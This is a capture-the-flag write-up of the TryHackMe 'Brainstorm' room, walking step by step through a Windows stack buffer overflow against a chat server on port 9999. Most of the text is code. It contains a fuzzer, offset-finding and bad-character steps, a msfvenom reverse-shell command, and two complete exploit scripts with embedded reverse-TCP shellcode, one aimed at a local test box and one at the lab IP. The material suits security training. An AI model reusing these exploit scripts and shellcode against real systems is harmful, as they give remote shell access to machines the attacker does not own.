In this post we will talk about Brainstorm room in THM. This room helps you with buffer overflow and OSCP
#1. Scanning with Nmap.
First of all, we should scan the network with nmap, so that to find some ports, that can help with buffer overflow.
Command:
nmap -A -T5 -oN nmap.txt -p- -Pn <IP>Results:
21/tcp - ftp server
3389/tcp - tcpwrapped
9999/tcp - vuln server
#2. Finding .exe file
In my case ftp doesn't work. So I just google and find files from github.
#3. Debugging
I have opened a python simple http server, so that get files from kali to my windows.
Now let's debug.
Open Immunity debugger and load the chatserver.exe. After that press F9 to run.
#4. Fuzzing
Let's create a fuzzer script.
Fuzzer script:
import socket
import time
import sys
buf = b'A' * 100
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.1.4', 9999))
s.recv(1024)
s.send(b'Shelldon\r\n')
s.recv(1024)
print(f'[*] FUZZING with {str(len(buf))} bytes')
s.send(buf + b'\r\n')
buf += b'A' * 100
s.close()
time.sleep(1)
except:
print('[!] ERROR')
sys.exit(0)
After running this script, vulnserver crashed after sending 2100 bytes.
It means, that buffer less or equal to 2100 bytes.
Buffer <= 2100 bytes
Ok, now we should find exact size of buffer.
I am using cyclic pattern for this.
#5. Exploit script.
Exploit script:
import socket
import time
import sys
cyclic = b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaakuaakvaakwaakxaakyaakzaalbaalcaaldaaleaalfaalgaalhaaliaaljaalkaallaalmaalnaaloaalpaalqaalraalsaaltaaluaalvaalwaalxaalyaalzaambaamcaamdaameaamfaamgaamhaamiaamjaamkaamlaammaamnaamoaampaamqaamraamsaamtaamuaamvaamwaamxaamyaamzaanbaancaandaaneaanfaangaanhaaniaanjaankaanlaanmaannaanoaanpaanqaanraansaantaanuaanvaanwaanxaanyaanzaaobaaocaaodaaoeaaofaaogaaohaaoiaaojaaokaaolaaomaaonaaooaaopaaoqaaoraaosaaotaaouaaovaaowaaoxaaoyaaozaapbaapcaapdaapeaapfaapgaaphaapiaapjaapkaaplaapmaapnaapoaappaapqaapraapsaaptaapuaapvaapwaapxaapyaapzaaqbaaqcaaqdaaqeaaqfaaqgaaqhaaqiaaqjaaqkaaqlaaqmaaqnaaqoaaqpaaqqaaqraaqsaaqtaaquaaqvaaqwaaqxaaqyaaqzaarbaarcaardaareaarfaargaarhaariaarjaarkaarlaarmaarnaaroaarpaarqaarraarsaartaaruaarvaarwaarxaaryaarzaasbaascaasdaaseaasfaasgaashaasiaasjaaskaaslaasmaasnaasoaaspaasqaasraassaastaasuaasvaaswaasxaasyaaszaatbaatcaatdaateaatfaatgaathaatiaatjaatkaatlaatmaatnaatoaatpaatqaatraatsaattaatuaatvaatwaatxaatyaatzaaubaaucaaudaaueaaufaaugaauhaauiaaujaaukaaulaaumaaunaauoaaupaauqaauraausaautaauuaauvaauwaauxaauyaau'
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.1.4', 9999))
s.recv(1024)
s.send(b'Shelldon\r\n')
s.recv(1024)
print('[*] Sending cyclic')
s.send(cyclic + b'\r\n')
s.close()
time.sleep(1)
except:
print('[!] ERROR')
sys.exit(0)
After running exploit, vulnserver was crashed. Now EIP equals to 75616164.
From hex is equals to uaad. In stack values located in reverse order.
So EIP equals to uaad. It is 2012 position.
Let's upgrade our exploit.
Buffer = 2008 bytes
EBP = 4 bytes
EIP = 4 bytes
#6. Bad chars
The next step is finding bad chars.
I am using badchars script to get array of all asci values in hex.
Bad chars added to payload after EIP value.
Before running exploit script, let's insist debugger with mona.
Command:
!mona config -set workingfolder C:/Users/Magzhan/Documents/THM/Brainstorm/%pAfter that, create bytearray.
Command:
!mona bytearray -b "\x00"Let's restart debugger and send payload.
Server crashed, now let's check bab our stack and find bad chars.
Command:
!mona compare -f <way to folder> -a <address of ESP>Only one bad chars is "\x00"
#7. Finding JMP ESP
Right click -> Search for -> all commands in all modules.
After that just type "jmp esp".
Result:
Let's use second one.
EIP = 625014EB
EIP = b'\xEB\x14\x50\x62' # in little endian
#8. NOPs and shellcode.
Let's add some nops to payload.
nops = b'\x90' * 32
Shellcode:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.5 LPORT=4444 -v shellcode -f python -b "\x00"
Exploit for testing localy:
import socket
import time
import sys
# cyclic = b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaakuaakvaakwaakxaakyaakzaalbaalcaaldaaleaalfaalgaalhaaliaaljaalkaallaalmaalnaaloaalpaalqaalraalsaaltaaluaalvaalwaalxaalyaalzaambaamcaamdaameaamfaamgaamhaamiaamjaamkaamlaammaamnaamoaampaamqaamraamsaamtaamuaamvaamwaamxaamyaamzaanbaancaandaaneaanfaangaanhaaniaanjaankaanlaanmaannaanoaanpaanqaanraansaantaanuaanvaanwaanxaanyaanzaaobaaocaaodaaoeaaofaaogaaohaaoiaaojaaokaaolaaomaaonaaooaaopaaoqaaoraaosaaotaaouaaovaaowaaoxaaoyaaozaapbaapcaapdaapeaapfaapgaaphaapiaapjaapkaaplaapmaapnaapoaappaapqaapraapsaaptaapuaapvaapwaapxaapyaapzaaqbaaqcaaqdaaqeaaqfaaqgaaqhaaqiaaqjaaqkaaqlaaqmaaqnaaqoaaqpaaqqaaqraaqsaaqtaaquaaqvaaqwaaqxaaqyaaqzaarbaarcaardaareaarfaargaarhaariaarjaarkaarlaarmaarnaaroaarpaarqaarraarsaartaaruaarvaarwaarxaaryaarzaasbaascaasdaaseaasfaasgaashaasiaasjaaskaaslaasmaasnaasoaaspaasqaasraassaastaasuaasvaaswaasxaasyaaszaatbaatcaatdaateaatfaatgaathaatiaatjaatkaatlaatmaatnaatoaatpaatqaatraatsaattaatuaatvaatwaatxaatyaatzaaubaaucaaudaaueaaufaaugaauhaauiaaujaaukaaulaaumaaunaauoaaupaauqaauraausaautaauuaauvaauwaauxaauyaau'
buf = b'A' * 2008
EBP = b'A' * 4
EIP = b'\xEB\x14\x50\x62' #625014EB
nops = b'\x90' * 32
# bad_chars = b'\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
# bad chars: \x00
shellcode = b""
shellcode += b"\xbb\x6f\xbf\xee\x95\xd9\xc8\xd9\x74\x24\xf4"
shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xc2\x04\x31\x5a\x0e"
shellcode += b"\x03\x35\xb1\x0c\x60\x35\x25\x52\x8b\xc5\xb6"
shellcode += b"\x33\x05\x20\x87\x73\x71\x21\xb8\x43\xf1\x67"
shellcode += b"\x35\x2f\x57\x93\xce\x5d\x70\x94\x67\xeb\xa6"
shellcode += b"\x9b\x78\x40\x9a\xba\xfa\x9b\xcf\x1c\xc2\x53"
shellcode += b"\x02\x5d\x03\x89\xef\x0f\xdc\xc5\x42\xbf\x69"
shellcode += b"\x93\x5e\x34\x21\x35\xe7\xa9\xf2\x34\xc6\x7c"
shellcode += b"\x88\x6e\xc8\x7f\x5d\x1b\x41\x67\x82\x26\x1b"
shellcode += b"\x1c\x70\xdc\x9a\xf4\x48\x1d\x30\x39\x65\xec"
shellcode += b"\x48\x7e\x42\x0f\x3f\x76\xb0\xb2\x38\x4d\xca"
shellcode += b"\x68\xcc\x55\x6c\xfa\x76\xb1\x8c\x2f\xe0\x32"
shellcode += b"\x82\x84\x66\x1c\x87\x1b\xaa\x17\xb3\x90\x4d"
shellcode += b"\xf7\x35\xe2\x69\xd3\x1e\xb0\x10\x42\xfb\x17"
shellcode += b"\x2c\x94\xa4\xc8\x88\xdf\x49\x1c\xa1\x82\x05"
shellcode += b"\xd1\x88\x3c\xd6\x7d\x9a\x4f\xe4\x22\x30\xc7"
shellcode += b"\x44\xaa\x9e\x10\xaa\x81\x67\x8e\x55\x2a\x98"
shellcode += b"\x87\x91\x7e\xc8\xbf\x30\xff\x83\x3f\xbc\x2a"
shellcode += b"\x03\x6f\x12\x85\xe4\xdf\xd2\x75\x8d\x35\xdd"
shellcode += b"\xaa\xad\x36\x37\xc3\x44\xcd\xd0\x2c\x30\xcc"
shellcode += b"\x25\xc5\x43\xce\x34\x49\xcd\x28\x5c\x61\x9b"
shellcode += b"\xe3\xc9\x18\x86\x7f\x6b\xe4\x1c\xfa\xab\x6e"
shellcode += b"\x93\xfb\x62\x87\xde\xef\x13\x67\x95\x4d\xb5"
shellcode += b"\x78\x03\xf9\x59\xea\xc8\xf9\x14\x17\x47\xae"
shellcode += b"\x71\xe9\x9e\x3a\x6c\x50\x09\x58\x6d\x04\x72"
shellcode += b"\xd8\xaa\xf5\x7d\xe1\x3f\x41\x5a\xf1\xf9\x4a"
shellcode += b"\xe6\xa5\x55\x1d\xb0\x13\x10\xf7\x72\xcd\xca"
shellcode += b"\xa4\xdc\x99\x8b\x86\xde\xdf\x93\xc2\xa8\x3f"
shellcode += b"\x25\xbb\xec\x40\x8a\x2b\xf9\x39\xf6\xcb\x06"
shellcode += b"\x90\xb2\xfc\x4c\xb8\x93\x94\x08\x29\xa6\xf8"
shellcode += b"\xaa\x84\xe5\x04\x29\x2c\x96\xf2\x31\x45\x93"
shellcode += b"\xbf\xf5\xb6\xe9\xd0\x93\xb8\x5e\xd0\xb1"
payload = buf + EBP + EIP + nops + shellcode
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.1.4', 9999))
s.recv(1024)
s.send(b'Shelldon\r\n')
s.recv(1024)
print('[*] Sending payload')
s.send(payload + b'\r\n')
s.close()
time.sleep(1)
except:
print('[!] ERROR')
sys.exit(0)Let's restart the debugger, run netcat listener and run exploit script.
Nice we get a shell.
Let's test it to victim machine and get a flag.
Before testing change IP address and regenerate shellcode.
Remote exploit script:
import socket
import time
import sys
# cyclic = b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaakuaakvaakwaakxaakyaakzaalbaalcaaldaaleaalfaalgaalhaaliaaljaalkaallaalmaalnaaloaalpaalqaalraalsaaltaaluaalvaalwaalxaalyaalzaambaamcaamdaameaamfaamgaamhaamiaamjaamkaamlaammaamnaamoaampaamqaamraamsaamtaamuaamvaamwaamxaamyaamzaanbaancaandaaneaanfaangaanhaaniaanjaankaanlaanmaannaanoaanpaanqaanraansaantaanuaanvaanwaanxaanyaanzaaobaaocaaodaaoeaaofaaogaaohaaoiaaojaaokaaolaaomaaonaaooaaopaaoqaaoraaosaaotaaouaaovaaowaaoxaaoyaaozaapbaapcaapdaapeaapfaapgaaphaapiaapjaapkaaplaapmaapnaapoaappaapqaapraapsaaptaapuaapvaapwaapxaapyaapzaaqbaaqcaaqdaaqeaaqfaaqgaaqhaaqiaaqjaaqkaaqlaaqmaaqnaaqoaaqpaaqqaaqraaqsaaqtaaquaaqvaaqwaaqxaaqyaaqzaarbaarcaardaareaarfaargaarhaariaarjaarkaarlaarmaarnaaroaarpaarqaarraarsaartaaruaarvaarwaarxaaryaarzaasbaascaasdaaseaasfaasgaashaasiaasjaaskaaslaasmaasnaasoaaspaasqaasraassaastaasuaasvaaswaasxaasyaaszaatbaatcaatdaateaatfaatgaathaatiaatjaatkaatlaatmaatnaatoaatpaatqaatraatsaattaatuaatvaatwaatxaatyaatzaaubaaucaaudaaueaaufaaugaauhaauiaaujaaukaaulaaumaaunaauoaaupaauqaauraausaautaauuaauvaauwaauxaauyaau'
buf = b'A' * 2008
EBP = b'A' * 4
EIP = b'\xEB\x14\x50\x62' #625014EB
nops = b'\x90' * 32
# bad_chars = b'\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
# bad chars: \x00
shellcode = b""
shellcode += b"\xbf\xad\x27\xc7\xc2\xdd\xc3\xd9\x74\x24\xf4"
shellcode += b"\x5e\x2b\xc9\xb1\x52\x31\x7e\x12\x03\x7e\x12"
shellcode += b"\x83\x6b\x23\x25\x37\x8f\xc4\x2b\xb8\x6f\x15"
shellcode += b"\x4c\x30\x8a\x24\x4c\x26\xdf\x17\x7c\x2c\x8d"
shellcode += b"\x9b\xf7\x60\x25\x2f\x75\xad\x4a\x98\x30\x8b"
shellcode += b"\x65\x19\x68\xef\xe4\x99\x73\x3c\xc6\xa0\xbb"
shellcode += b"\x31\x07\xe4\xa6\xb8\x55\xbd\xad\x6f\x49\xca"
shellcode += b"\xf8\xb3\xe2\x80\xed\xb3\x17\x50\x0f\x95\x86"
shellcode += b"\xea\x56\x35\x29\x3e\xe3\x7c\x31\x23\xce\x37"
shellcode += b"\xca\x97\xa4\xc9\x1a\xe6\x45\x65\x63\xc6\xb7"
shellcode += b"\x77\xa4\xe1\x27\x02\xdc\x11\xd5\x15\x1b\x6b"
shellcode += b"\x01\x93\xbf\xcb\xc2\x03\x1b\xed\x07\xd5\xe8"
shellcode += b"\xe1\xec\x91\xb6\xe5\xf3\x76\xcd\x12\x7f\x79"
shellcode += b"\x01\x93\x3b\x5e\x85\xff\x98\xff\x9c\xa5\x4f"
shellcode += b"\xff\xfe\x05\x2f\xa5\x75\xab\x24\xd4\xd4\xa4"
shellcode += b"\x89\xd5\xe6\x34\x86\x6e\x95\x06\x09\xc5\x31"
shellcode += b"\x2b\xc2\xc3\xc6\x4c\xf9\xb4\x58\xb3\x02\xc5"
shellcode += b"\x71\x70\x56\x95\xe9\x51\xd7\x7e\xe9\x5e\x02"
shellcode += b"\xd0\xb9\xf0\xfd\x91\x69\xb1\xad\x79\x63\x3e"
shellcode += b"\x91\x9a\x8c\x94\xba\x31\x77\x7f\xcf\xcd\x28"
shellcode += b"\x0d\xa7\xcf\xd6\xe0\x6b\x59\x30\x68\x84\x0f"
shellcode += b"\xeb\x05\x3d\x0a\x67\xb7\xc2\x80\x02\xf7\x49"
shellcode += b"\x27\xf3\xb6\xb9\x42\xe7\x2f\x4a\x19\x55\xf9"
shellcode += b"\x55\xb7\xf1\x65\xc7\x5c\x01\xe3\xf4\xca\x56"
shellcode += b"\xa4\xcb\x02\x32\x58\x75\xbd\x20\xa1\xe3\x86"
shellcode += b"\xe0\x7e\xd0\x09\xe9\xf3\x6c\x2e\xf9\xcd\x6d"
shellcode += b"\x6a\xad\x81\x3b\x24\x1b\x64\x92\x86\xf5\x3e"
shellcode += b"\x49\x41\x91\xc7\xa1\x52\xe7\xc7\xef\x24\x07"
shellcode += b"\x79\x46\x71\x38\xb6\x0e\x75\x41\xaa\xae\x7a"
shellcode += b"\x98\x6e\xde\x30\x80\xc7\x77\x9d\x51\x5a\x1a"
shellcode += b"\x1e\x8c\x99\x23\x9d\x24\x62\xd0\xbd\x4d\x67"
shellcode += b"\x9c\x79\xbe\x15\x8d\xef\xc0\x8a\xae\x25"
payload = buf + EBP + EIP + nops + shellcode
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.10.48.199', 9999))
s.recv(1024)
s.send(b'Shelldon\r\n')
s.recv(1024)
print('[*] Sending payload')
s.send(payload + b'\r\n')
s.close()
time.sleep(1)
except:
print('[!] ERROR')
sys.exit(0)
Final result:
Comentários